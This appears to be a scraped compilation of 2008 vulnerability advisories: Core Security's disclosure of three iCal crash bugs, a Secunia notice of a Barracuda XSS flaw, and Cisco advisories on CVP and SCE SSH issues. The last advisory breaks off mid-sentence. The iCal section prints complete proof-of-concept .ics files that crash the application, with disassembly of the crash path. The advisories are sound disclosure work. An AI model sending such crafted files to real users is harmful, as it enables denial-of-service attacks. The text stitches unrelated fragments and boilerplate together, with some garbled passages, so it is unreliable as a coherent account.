vulnerabilities lead to abnormal termination (crash) of the iCal application due to null-pointer dereference bugs triggered while parsing a malformed '.ics' files. Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted '.ics' file send over email or hosted on a malicious web server; or without direct user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server. *Vulnerable Packages* . iCal version 3.0.1 on MacOS X 10.5.1 (Leopard). *Non-vulnerable Packages* . Available through Apple security updates (see vendor information below). *Vendor Information, Solutions and Workarounds* The following information was provided by the vendor: Availability Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338 Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/ Cross-References If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222 *Credits* These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT). A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicous .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format. 1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006) Improper sanitization of integer input may lead to null pointer dereference and possibly to an application that loses control of its execution, resulting in a denial of service. A vulnerable .ics file will contain the following line: /----------- RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 - -----------/ The 'COUNT' value causes an integer overflow, which leads to a null pointer dereference when iCal tries to use it after the .ics file is imported. The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME: Vulnerable VERSION:2.0 X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:4 DTSTART;TZID=America/Buenos_Aires:20071225T110000 DURATION:PT1H UID:48878014-5F03-43E5-8639-61E708714F9A DTSTAMP:20071213T130632Z SUMMARY:Vuln CREATED:20071213T130611Z RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 END:VEVENT END:VCALENDAR - -----------/ Analysis of the vulnerability The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer 'EDI=0'. Only the value of 'EAX' is under control, must be less than '0x7fffffff' and is extracted from the following line of the PoC '.ics' file. /----------- RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE) - -----------/ /----------- __text:0013C178 push ebp __text:0013C179 mov ebp, esp __text:0013C17B sub esp, 38h __text:0013C17E mov eax, ds:off_1F435C __text:0013C183 mov [ebp+var_4], edi __text:0013C186 mov edi, [ebp+arg_C] __text:0013C189 mov [ebp+var_8], esi __text:0013C18C mov esi, [ebp+arg_8] __text:0013C18F mov [ebp+var_C], ebx __text:0013C192 mov [esp+38h+var_34], eax __text:0013C196 mov eax, [ebp+arg_0] __text:0013C199 mov [esp+38h+var_28], 0 __text:0013C1A1 mov [esp+38h+var_2C], 0 - -----------/ Here is written on '[ebp + var28]' and '[ebp + var2C]' and because 'EBP' is 'ESP' minus '0x38', this is similar to /----------- [ebp + var28] = [esp+0x38+var_28] [ebp + var2C] = [esp+0x38+var_2C] - -----------/ There are located the null-pointers on the stack. /----------- BFFFEF7C var_2C dd 0 BFFFEF80 var_28 dd 0 - -----------/ Upon reaching the function where the crash occurs. /----------- __text:0014ADC3 push ebp __text:0014ADC4 mov ebp, esp __text:0014ADC6 sub esp, 48h __text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass - -----------/ Logically the zeros are still present because don't work with those values until we enter. /----------- BFFFEF7C arg_C dd 0 BFFFEF80 arg_10 dd 0 - -----------/ We see that the function argument 'arg_C' is loaded and moved to 'EDI'. /----------- 0014ADE0 mov edi, [ebp+arg_C] - -----------/ And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed. /----------- 0014AE2F mov dword ptr [edi], 0 - -----------/ When getting closer to the point of crash because we control 'EAX' and we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'. /----------- 0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1) 0014AE23 jl short loc_14AE2F 0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F) 0014AE2D jle short loc_14AE37 169280B8 dd 270Fh (ebx+08) 169280BC dd 1 (ebx+0C) - -----------/ The first comparison for 'JL' doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location. In the other case a comparison is made such that if 'EAX' is less than '0x270f' the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than '0x7fffffff' the maximum value is used instead. 2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006) A vulnerable .ics file will contain the following line: /----------- TRIGGER:-PT65535H - -----------/ The 'TRIGGER' value causes a null pointer dereference when iCal tries to use it after the .ics file is imported. The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and accept it without changes. /----------- BEGIN:VCALENDAR X-WR-CALNAME:Fake event PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN VERSION:2.0 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:10 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T124414Z SUMMARY:Fake Event DTEND;TZID=America/Buenos_Aires:20071225T010000 RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 TRANSP:OPAQUE CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT65535H END:VALARM END:VEVENT END:VCALENDAR - -----------/ 3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007) This is another case of bad validation of a file with the iCalendar format that results in a more serious bug. A vulnerable .ics file will contain the following line: /----------- ATTACH;VALUE=URI:S=osumi - -----------/ The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME:evento falso VERSION:2.0 X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:11 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T143420Z SUMMARY:evento falso DTEND;TZID=America/Buenos_Aires:20071225T010000 LOCATION:donde se hace RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 TRANSP:OPAQUE UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 URL;VALUE=URI:http://pepe.com:443/pepe ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php CREATED:20071213T142720Z CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT15H END:VALARM BEGIN:VALARM X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0 ACTION:AUDIO TRIGGER:-PT15M ATTACH;VALUE=URI:S=osumi END:VALARM END:VEVENT END:VCALENDAR - -----------/ *Report Timeline* . 2008-01-30: Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available. 2008-01-31: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft, including proof-of-concept files that trigger the bugs. 2008-02-12: Core requests update info on the vulnerabilities and states that wants to coordinate the date of the disclosure. 2008-02-18: Core requests update info on the vulnerabilities. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update. 2008-02-19: Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, will dealt bydealing with the three vulnerabilities in the iCal client application will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case if Core considers that the information provided in the advisory would help end users to decide how to react the advisory would be published sooner as a "forced release". 2008-03-03: Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds". 2008-03-04: Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server. 2008-03-13: Core re-schedules the publication to March 24th and requests the vendor an update on the coordinated date of disclosure. The remaining three vulnerabilities in the iCal client application will be dealt by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes. 2008-03-18: APPLE-SA-2008-0318 software update released. 2008-03-18: CORE-2008-0123 is published. 2008-03-18: Vendor informs that will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fix them. Additional timing information will be provided closer to the estimated date. 2008-03-18: Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor. 2008-04-04: Core requests a more precise date of release of the fixes to coordinate the publication and recommends the vendor to consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited. 2008-04-07: Vendor requests that Core to postpone the advisory publication until the fix is available. 2008-04-07: Core requests a more precise date of release of the fixes to coordinate the new publication date. 2008-04-07: Vendor informs that the estimated date for the update is near the end of April. 2008-04-08: Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable. 2008-04-16: Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated date and provides more details that explain why the first two bugs are been considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer which later triggers a null pointer de-reference that causes the application to crash. the root cause of the crash is a NULL pointer de-reference and not an integer overflow. 2008-04-17: Core confirms that the two first bugs can be considered crashes due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes. 2008-04-17: Vendor asks confirmation that the first two bugs have no security related consequences. 2008-04-17: Core responds that the three bugs still have security related consequences. The first two bugs can be abuse to execute denial of service attacks by untrusted and unauthenticated third parties specifically using public server as attack vector. Core considers bug that allow unauthenticated third parties to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem. 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software fixes release. 2008-05-05: Core informs the vendor that it's re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being released sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule publication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory. 2008-05-12: Core communicates the vendor that the publication of the advisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21: An edited and corrected final version of the advisory is sent to the vendor. 2008-05-21: Advisory CORE-2008-0126 is published. *References* [1] RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445 [2] RFC 4791: Calendaring Extensions to WebDAV - http://tools.ietf.org/html/rfc4791 [3] http://www.apple.com/downloads/macosx/calendars/ [4] iCalShare http://icalshare.com/ [5] iCalWorld http://www.icalworld.com/ *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -----END PGP SIGNATURE-----

Cross-site scripting (XSS) vulnerability in ldap_test.cgi in Barracuda Spam Firewall (BSF) before 3.5.11.025 allows remote attackers to inject arbitrary web script or HTML via the email parameter. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable. The Barracuda device provides the LDAP test function through the ldap_test.cgi script. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Input passed to the "email" parameter in cgi-bin/ldap_test.cgi is not properly sanitised before being returned to a user. Other versions may also be affected. SOLUTION: Update to firmware version 3.5.11.025 (2008-05-16). PROVIDED AND/OR DISCOVERED BY: Mark Crowther, Information Risk Management Plc. ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/support/tech_alert.php Information Risk Management Plc.: http://www.irmplc.com/index.php/168-Advisory-027 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco Unified Customer Voice Portal (CVP) 4.0.x before 4.0(2)_ES14, 4.1.x before 4.1(1)_ES11, and 7.x before 7.0(1) allows remote authenticated users with administrator role privileges to create, modify, or delete a superuser account. A user who is remotely authenticated may create, modify, or delete a super user with the administrator role.Please refer to the “Overview” for the impact of this vulnerability. Note that this issue is exploitable only by users with administrative access to the affected software. Successfully exploiting this issue allows attackers to gain superuser access, facilitating the complete compromise of affected computers. This issue is documented as Cisco Bug ID CSCsj93874. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: CVP 4.0.x: Update to 4.0(2)_ES14: http://www.cisco.com/pcgi-bin/tablebuild.pl/36833091037661f49ad8152368c22bbf CVP 4.1.x: Update to 4.1(1)_ES11: http://www.cisco.com/pcgi-bin/tablebuild.pl/946b57654c80187da8c3cfc0aa02866e CVP 7.x: Update to 7.0(1) or later. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-cvp.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Cisco has released free software updates that address this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-cvp.shtml. Affected Products ================= Vulnerable Products +------------------ CVP software versions prior to 4.0(2)_ES14 for the 4.0.x release, 4.1(1)_ES11 for the 4.1.x release, and 7.0(1) for the 7.x release are vulnerable. Note: CVP systems running software release 3.x are not vulnerable. Products Confirmed Not Vulnerable +-------------------------------- CVP systems running software release 3.x are not vulnerable. CVP systems running version 7.0(1) or later are not vulnerable. No other Cisco products are currently known to be affected by this vulnerability. Using CVP, organizations can provide intelligent, personalized self-service over the phone, allowing customers to efficiently retrieve the information they need from the contact center. There are three different user roles within CVP: superuser, administrator, and read-only access. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS Cat http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * Possible to create & delete superuser accounts from user accounts (CSCsj93874) CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerability may result in full control of the system. CVP software version 4.0(2)_ES14 can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/36833091037661f49ad8152368c22bbf CVP software version 4.1(1)_ES11 can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/946b57654c80187da8c3cfc0aa02866e When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Workarounds =========== There are no workarounds for this vulnerability. Obtaining Fixed Software ======================== Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was found during internal product testing. Status of this Notice: Final ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-cvp.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100933 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIND3o86n/Gc8U/uARAoLgAJ9Vxx0ti1CFaKrzxLFx9T/IapmQwQCglJsw 2zkjOWDEYSdtNE36ygSkqqs= =fWTq -----END PGP SIGNATURE-----

The SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device restart or daemon outage) via a high rate of login attempts, aka Bug ID CSCsi68582. The Icon Labs Iconfidant SSH server contails multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. The problem is Bug IDs CSCsi68582 It is a problem.Service disruption by a third party through frequent login attempts (DoS) There is a possibility of being put into a state. Versions prior to Iconfidant SSH 2.3.8 are vulnerable. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Successful exploitation of these vulnerabilities requires that the SSH server is enabled (not enabled by default). SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. * SSH login activity leads to illegal Input/Output operations A second vulnerability exists in the SCE SSH server that may be triggered with normal SSH traffic to the SCE management interface occurring in conjunction with other management tasks. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers 